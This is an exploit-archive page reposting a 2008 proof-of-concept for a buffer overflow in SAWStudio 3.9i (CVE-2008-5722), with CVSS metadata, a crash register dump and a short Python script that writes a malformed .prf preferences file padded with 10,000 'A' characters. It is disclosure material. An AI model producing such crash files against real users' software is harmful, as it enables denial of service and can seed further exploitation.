SAWStudio 3.9i (prf File) Local Buffer Overflow PoC

2008.12.30
Credit: Encrypt3d.M!nd
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-5722
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# SAWStudio 3.9i (prf file) Buffer overflow Poc # By:Encrypt3d.M!nd # # Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder,GGY,and all my friends ##################################################################### # # when you import Prefernces File "prf file" contain long characters # an overflow will occure,and the registers will be just like this: # # # EAX:41414141 ECX:00000000 EDX:00561498 EBX:00000000 # ESP:0012DA5C EBP:0012FAD0 ESI:00561498 EDI:00000000 # EIP:7C91B1FA ntdll.7C91B1FA # # Access violation when writing to[41414151] # # Tested on: Windows XP SP3 ##################################################################### l337 = ("\x53\x41\x57\x53\x54\x55\x44\x49\x4F\x20\x50\x52\x45\x46\x45\x52\x45\x4E\x43\x45\x53\x20\x53\x54\x52\x55\x43\x54\x20\x20\x20\x20\x20") pl = "A"*10000 file=open('enc.prf','w+') file.write(l337+pl) file.close()

References:

http://www.securityfocus.com/bid/33011
http://www.milw0rm.com/exploits/7578


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top